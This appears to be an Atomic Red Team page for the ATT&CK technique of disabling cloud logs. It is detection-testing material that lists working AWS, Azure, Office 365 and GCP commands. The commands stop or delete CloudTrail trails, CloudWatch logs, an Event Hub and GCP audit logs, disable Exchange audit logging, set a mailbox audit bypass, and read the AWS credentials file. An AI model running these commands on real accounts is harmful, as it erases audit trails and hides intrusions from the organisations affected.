Try it using Invoke-Atomic

Impair Defenses: Disable Cloud Logs

Description from ATT&CK

An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.

For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the 

1

Set-MailboxAuditBypassAssociation
cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)

Atomic Tests

Atomic Test #1 - AWS - CloudTrail Changes

Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail

Supported Platforms: iaas:aws

auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e

Inputs:

Name Description Type Default Value
cloudtrail_name Name of the cloudTrail string redatomictesttrail
s3_bucket_name Name of the bucket string redatomic-test
region Name of the region string us-east-1

Attack Commands: Run with sh!

1
2
3
4

aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}

Cleanup Commands:

1
2
3

cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
terraform destroy -auto-approve

Dependencies: Run with sh!

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2

cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2

echo Please install the aws-cli and configure your AWS default profile using: aws configure

Description: Check if terraform is installed.

Check Prereq Commands:

1
2

terraform version

Get Prereq Commands:

1
2

echo Please install the terraform and configure your aws default profile

Description: Check if the dependency resources are already present.

Check Prereq Commands:

1
2

if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4

cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
terraform init
terraform apply -auto-approve

Atomic Test #2 - Azure - Eventhub Deletion

Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.

Supported Platforms: iaas:azure

auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719

Inputs:

Name Description Type Default Value
username Azure username string None
password Azure password string None
event_hub_name Name of the eventhub string test_eventhub
resource_group Name of the resource group string None
name_space_name Name of the NameSpace string None

Attack Commands: Run with powershell!

1
2
3
4
5

$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-AzureAD -Credential $creds
Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}

Cleanup Commands:

1
2
3

cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
terraform destroy -auto-approve

Dependencies: Run with powershell!

Description: Install-Module -Name Az

Check Prereq Commands:

1
2

try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

Get Prereq Commands:

1
2

Install-Module -Name AzureAD -Force

Description: Check if terraform is installed.

Check Prereq Commands:

1
2

terraform version

Get Prereq Commands:

1
2

echo Please install the terraform.

Description: Check if the user is logged into Azure.

Check Prereq Commands:

1
2

az account show

Get Prereq Commands:

1
2

echo Configure your Azure account using: az login.

Description: Create dependency resources using terraform

Check Prereq Commands:

1
2

try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}

Get Prereq Commands:

1
2
3
4

cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
terraform init
terraform apply -auto-approve

Atomic Test #3 - Office 365 - Exchange Audit Log Disabled

You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox. Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline. https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml

Supported Platforms: office-365

auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c

Inputs:

Name Description Type Default Value
username office-365 username string None
password office-365 password string None

Attack Commands: Run with powershell!

1
2
3
4
5

$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False

Cleanup Commands:

1
2
3
4
5

$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True

Dependencies: Run with powershell!

Description: ExchangeOnlineManagement PowerShell module must be installed

Check Prereq Commands:

1
2
3
4

$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}

Get Prereq Commands:

1
2
3

Install-Module -Name ExchangeOnlineManagement         
Import-Module ExchangeOnlineManagement

Atomic Test #4 - AWS - Disable CloudTrail Logging Through Event Selectors using Stratus

Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/

Supported Platforms: linux,macos,iaas:aws

auto_generated_guid: a27418de-bdce-4ebd-b655-38f11142bf0c

Inputs:

Name Description Type Default Value
stratus_path Path of stratus binary path $PathToAtomicsFolder/T1562.008/src
aws_region AWS region to detonate string us-west-2

Attack Commands: Run with sh!

1
2
3
4
5
6
7

export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-event-selectors
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force

Cleanup Commands:

1
2
3
4
5
6

export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*

Dependencies: Run with sh!

Description: Stratus binary must be present at the (#{stratus_path}/stratus)

Check Prereq Commands:

1
2

if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
5
6
7
8
9

if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2

cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2

echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #5 - AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus

This Atomic test will use the Stratus Red Team will first setup a CloudTrail logging into an S3 bucket and will then make an API call to update the lifecycle rule on that S3 bucket with an expiration date of 1 day. This will essentially delete all the logs after one day. Adversaries often do this actiivity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/

Supported Platforms: linux,macos

auto_generated_guid: 22d89a2f-d475-4895-b2d4-68626d49c029

Inputs:

Name Description Type Default Value
stratus_path Path of stratus binary path $PathToAtomicsFolder/T1562.008/src
aws_region AWS region to detonate string us-west-2

Attack Commands: Run with sh!

1
2
3
4
5
6
7

export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force

Cleanup Commands:

1
2
3
4
5
6

export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*

Dependencies: Run with sh!

Description: Stratus binary must be present at the (#{stratus_path}/stratus)

Check Prereq Commands:

1
2

if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
5
6
7
8
9

if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2

cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2

echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #6 - AWS - Remove VPC Flow Logs using Stratus

This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/

Supported Platforms: linux,macos,iaas:aws

auto_generated_guid: 93c150f5-ad7b-4ee3-8992-df06dec2ac79

Inputs:

Name Description Type Default Value
stratus_path Path of stratus binary path $PathToAtomicsFolder/T1562.008/src
aws_region AWS region to detonate string us-west-2

Attack Commands: Run with sh!

1
2
3
4
5
6
7

export AWS_REGION=#{aws_region} 
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.vpc-remove-flow-logs
echo "starting detonate"
./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force

Cleanup Commands:

1
2
3
4
5
6

export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*

Dependencies: Run with sh!

Description: Stratus binary must be present at the (#{stratus_path}/stratus)

Check Prereq Commands:

1
2

if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2
3
4
5
6
7
8
9

if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4) 
  wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2

cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2

echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #7 - AWS - CloudWatch Log Group Deletes

Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion

Supported Platforms: iaas:aws

auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121

Inputs:

Name Description Type Default Value
cloudwatch_log_group_name Name of the cloudWatch log group string log-test
region Name of the region string us-east-1

Attack Commands: Run with sh!

1
2
3
4
5

aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"

Dependencies: Run with sh!

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2

cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2

echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #8 - AWS CloudWatch Log Stream Deletes

Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html

Supported Platforms: iaas:aws

auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932

Inputs:

Name Description Type Default Value
cloudwatch_log_group_name Name of the cloudWatch log group string test-logs
cloudwatch_log_stream_name Name of the cloudWatch log stream string 20150601
region Name of the region string us-west-2

Attack Commands: Run with sh!

1
2
3
4
5
6
7
8
9

aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
echo "*** Log Stream Created ***"
aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"

Dependencies: Run with sh!

Description: Check if ~/.aws/credentials file has a default stanza is configured

Check Prereq Commands:

1
2

cat ~/.aws/credentials | grep "default"

Get Prereq Commands:

1
2

echo Please install the aws-cli and configure your AWS defult profile using: aws configure

Atomic Test #9 - Office 365 - Set Audit Bypass For a Mailbox

Use Exchange Management Shell to Mailbox auditing to bypass. It will prevent any mailbox audit logging entries being generated for the target e-mail box. https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps

Supported Platforms: office-365

auto_generated_guid: c9a2f6fe-7197-488c-af6d-10c782121ca6

Inputs:

Name Description Type Default Value
username office-365 username string o365_user_test
password office-365 password string o365_password_test
target_email office-365 target_email string o365_email_test

Attack Commands: Run with powershell!

1
2
3
4
5

$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $true

Cleanup Commands:

1
2
3
4
5
6

$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $false
Disconnect-ExchangeOnline -Confirm:$false

Dependencies: Run with powershell!

Description: ExchangeOnlineManagement PowerShell module must be installed

Check Prereq Commands:

1
2
3
4

$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}

Get Prereq Commands:

1
2
3

Install-Module -Name ExchangeOnlineManagement         
Import-Module ExchangeOnlineManagement

Atomic Test #10 - GCP - Delete Activity Event Log

GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data Access, System Events, and Policy Denied. An adversary may attempt to delete logs in order to hide their activity. However, Admin Activity, System Events, and Policy Deny events logs cannot be deleted.

This Atomic attempts to delete the Activity Event log. An event is generated under the method name of 

1

google.logging.v2.LoggingServiceV2.DeleteLog
with a Serverity of 
1

ERROR
.

Supported Platforms: iaas:gcp

auto_generated_guid: d56152ec-01d9-42a2-877c-aac1f6ebe8e6

Inputs:

Name Description Type Default Value
project-id ID of the GCP Project you to execute the command against. string atomic-project-1

Attack Commands: Run with sh!

1
2
3

gcloud config set project #{project-id}
gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet

Dependencies: Run with sh!

Description: Requires gcloud

Check Prereq Commands:

1
2

if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;

Get Prereq Commands:

1
2

echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"

Description: Check if user is logged in

Check Prereq Commands:

1
2

gcloud config get-value account

Get Prereq Commands:

1
2

gcloud auth login --no-launch-browser

source